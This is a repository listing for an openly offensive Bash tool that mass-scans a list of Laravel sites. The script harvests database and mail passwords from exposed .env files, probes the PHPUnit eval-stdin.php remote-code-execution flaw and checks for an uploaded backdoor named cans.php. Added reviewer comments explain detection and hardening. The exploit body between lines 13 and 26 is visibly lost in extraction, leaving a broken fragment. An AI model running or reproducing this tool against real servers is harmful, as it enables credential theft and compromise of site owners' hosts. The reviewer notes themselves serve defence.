├── rce.jpg
├── README.md
└── laraxpl.sh

/rce.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vsec7/Laravel-PhpUnit-Rce-And-Get-Env-Exploiter/master/rce.jpg
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Laravel-PhpUnit-Rce-And-Get-Env-Exploiter
2 | Laravel PhpUnit Rce And Get Env Exploiter
3 |
4 | ## Screenshot
5 | ![Exploiter](https://raw.githubusercontent.com/vsec7/Laravel-PhpUnit-Rce-And-Get-Env-Exploiter/master/rce.jpg)
6 |
7 | ## Usage
8 | ```
9 | chmod +x laraxpl.sh
10 | ./laraxpl.sh
11 | ```
12 |
13 | ### By : Versailles ( Sec7or Team ~ Surabaya Hacker Link )
14 |
--------------------------------------------------------------------------------
/laraxpl.sh:
--------------------------------------------------------------------------------
# Review notes: every line below that starts with "#" in column 0 is a
# reviewer comment and not part of the original file.
#
# What the listing shows: for each URL in a user-supplied list the script
# requests <base>/.env, sends a request to
# <base>/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php, and then requests
# cans.php in that same directory. Findings are appended to
# laravel-env-log.txt and laravel-rce-log.txt in the working directory.
#
# Defensive takeaways: a web server should never serve .env or anything under
# vendor/ (PHPUnit is a development dependency and does not belong on a
# production host). Requests for these three paths in access logs indicate
# scanning and, for cans.php, possible compromise.
1 | #!/usr/bin/env bash
2 | # Laravel PhpUnit Rce & Get Env
3 | # Coded By Viloid
4 | # Sec7or Team ~ Surabaya Hacker Link
5 | # Usage : ./laraxpl.sh
6 |
# ANSI colour escapes used in the status output (red, green, orange, reset).
7 | R='\033[0;31m'
8 | G='\e[32m'
9 | O='\033[0;33m'
10 | N='\033[0m'
11 |
# header(): banner printer.
# NOTE(review): the rest of this function and the opening of rce() (listing
# lines 13-26, including the here-document and the start of the curl command)
# were lost when the page was extracted. The fragment on line 13 is kept
# exactly as found; the missing text is deliberately not reconstructed.
12 | header(){
13 |   cat <" "$1/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php")
# Remainder of rce(); $1 is the base URL. $g is presumably assigned from the
# command substitution that ends on line 13 (its closing parenthesis is all
# that survives; confirm against the original file). A response containing
# "Cans21 :" is treated as a positive result, and the text after the marker is
# reported as the kernel string.
27 |   uname=$(echo $g | grep -oP 'Cans21 :\K[^:]+')
28 |   if [[ ! -z $uname ]]; then
29 |     rc="${G}RCE${N}"
30 |     un="${G}[*] Kernel : $uname${N}${N}"
# Second check: fetch cans.php from the same directory and count lines that
# contain the marker. The script's own messages call this file an uploaded
# backdoor, so finding vendor/phpunit/phpunit/src/Util/PHP/cans.php on a
# server means the host must be treated as compromised, not merely probed.
31 |     if [[ $(curl -s $1/vendor/phpunit/phpunit/src/Util/PHP/cans.php | grep -ic "Cans21") -eq 1 ]]; then
32 |       shell="${G}[*] Successfully Uploaded : ${O}$1/vendor/phpunit/phpunit/src/Util/PHP/cans.php${N}"
# Appends the URL of the planted file to laravel-rce-log.txt. For an
# investigator this log enumerates affected hosts.
33 |       echo "$1/vendor/phpunit/phpunit/src/Util/PHP/cans.php" >> laravel-rce-log.txt
34 |     else
35 |       shell="${R}[-] Failed Uploading Backdoor${N}"
36 |     fi
37 |     loc="\n$un\n$shell\n"
38 |   else
39 |     rc="${R}RCE${N}"
40 |   fi
41 | }
42 |
# env(): $1 is the base URL. Downloads <base>/.env and extracts DB_* and MAIL_*
# values with grep -oP. Sets the globals en, sm, dbs and smtp, which exploit()
# prints in its summary line.
# Defender view: a .env that answers over HTTP hands out database and mail
# credentials in clear text. Deny dotfiles at the web server, keep the document
# root at public/, and rotate every secret in a .env that was ever reachable.
43 | env(){
44 |   g=$(curl -s "$1/.env")
# $g is expanded unquoted, so the response is flattened onto one line. That is
# why each pattern below stops at the first space.
45 |   db_host=$(echo $g | grep -oP 'DB_HOST=\K[^ ]+')
46 |   db=$(echo $g | grep -oP 'DB_DATABASE=\K[^ ]+')
47 |   db_u=$(echo $g | grep -oP 'DB_USERNAME=\K[^ ]+')
48 |   db_p=$(echo $g | grep -oP 'DB_PASSWORD=\K[^ ]+')
49 |   m_host=$(echo $g | grep -oP 'MAIL_HOST=\K[^ ]+')
50 |   m_port=$(echo $g | grep -oP 'MAIL_PORT=\K[^ ]+')
51 |   m_u=$(echo $g | grep -oP 'MAIL_USERNAME=\K[^ ]+')
52 |   m_p=$(echo $g | grep -oP 'MAIL_PASSWORD=\K[^ ]+')
53 |
# No DB_HOST in the response is reported as "no .env". The MAIL_* values are
# examined only when DB_HOST was found.
54 |   if [[ -z $db_host ]]; then
55 |     en="${R}DB${N}"
56 |   else
57 |     en="${G}DB${N}"
58 |     dbs="${G}\n [*] DB_HOST : $db_host\n [*] DB_DATABASE : $db\n [*] DB_USERNAME : $db_u\n [*] DB_PASSWORD : $db_p\n${N}"
# Harvested values are appended in plain text to laravel-env-log.txt.
59 |     echo "$1 | DATABASE : $db_host | $db | $db_u | $db_p" >> laravel-env-log.txt
# Empty, "null", localhost and mailtrap mail hosts are reported as no SMTP.
60 |     if [[ -z $m_host || $m_host == "null" || $m_host == "localhost" || $m_host == "mailtrap.io" || $m_host == "smtp.mailtrap.io" ]]; then
61 |       sm="${R}SMTP${N}"
62 |     else
63 |       sm="${G}SMTP${N}"
64 |       smtp="${G}\n [*] MAIL_HOST : $m_host\n [*] MAIL_PORT : $m_port\n [*] MAIL_USERNAME : $m_u\n [*] MAIL_PASSWORD : $m_p\n${N}"
65 |       echo "$1 | SMTP : $m_host | $m_port | $m_u | $m_p" >> laravel-env-log.txt
66 |     fi
67 |   fi
68 |
69 | }
70 |
# exploit(): $1 is a URL from the list, $2 its 1-based position. Reduces the URL
# to scheme and host (the text before the first "/" after "//"), calls env()
# and, if that returns success, rce(). It then prints one summary line built
# from the globals those functions set plus w and tot from the main loop.
71 | exploit(){
72 |   u=$(echo $1 | grep -Po '.*?//.*?(?=/)')
73 |   env $u && rce $u
74 |   echo -e "[$w][$2/$tot] $1 [$en][$sm][$rc]$dbs$smtp$loc"
75 | }
76 |
77 | header
78 |
# Interactive setup: the path of the target list (must be an existing file),
# then the values t and s that the loop below uses as batch size and pause in
# seconds.
79 | read -p "[?] List Target : " l
80 | if [[ ! -f $l ]]; then
81 |   echo "[-] File $l Not Exist!"
82 |   exit 1
83 | fi
84 |
85 | read -p "[?] Threads (Default 10): " t
86 | if [[ $t="" ]]; then
87 |   t=10;
88 | fi
89 |
90 | read -p "[?] Delay (Default 1): " s
91 | if [[ $s="" ]]; then
92 |   s=1;
93 | fi
94 |
95 | echo
96 | echo -e "[!] ${G}Target Loaded : ${O}$(wc -l $l)${N}"
97 | echo -e "[!] ${G}Thread : ${O}$t${N}"
98 | echo -e "[!] ${G}Delay : ${O}$s sec${N}"
99 | echo -e "[+] ${G}Start Exploit.......${N}\n"
100 |
# Main loop: one background job per line of the list (IFS is set to CR/LF so
# each line is one item). Whenever the counter is a multiple of t the loop
# sleeps s seconds before starting the next job. The final `wait` blocks until
# all jobs have finished.
# Detection note: a listed host sees the .env request followed by the
# eval-stdin.php request from the same client within moments. The two curl
# calls visible in full (lines 31 and 44) set no User-Agent header, so they go
# out with curl's default.
101 | n=1
102 | IFS=$'\r\n'
103 | for i in $(cat $l); do
104 |   f=$(expr $n % $t)
105 |   if [[ $f == 0 && $n > 0 ]]; then
106 |     sleep $s
107 |   fi
108 |   w=$(date '+%H:%M:%S')
109 |   tot=$(cat $l | wc -l)
110 |   exploit $i $n &
111 |   n=$[$n+1]
112 | done
113 | wait
114 |
--------------------------------------------------------------------------------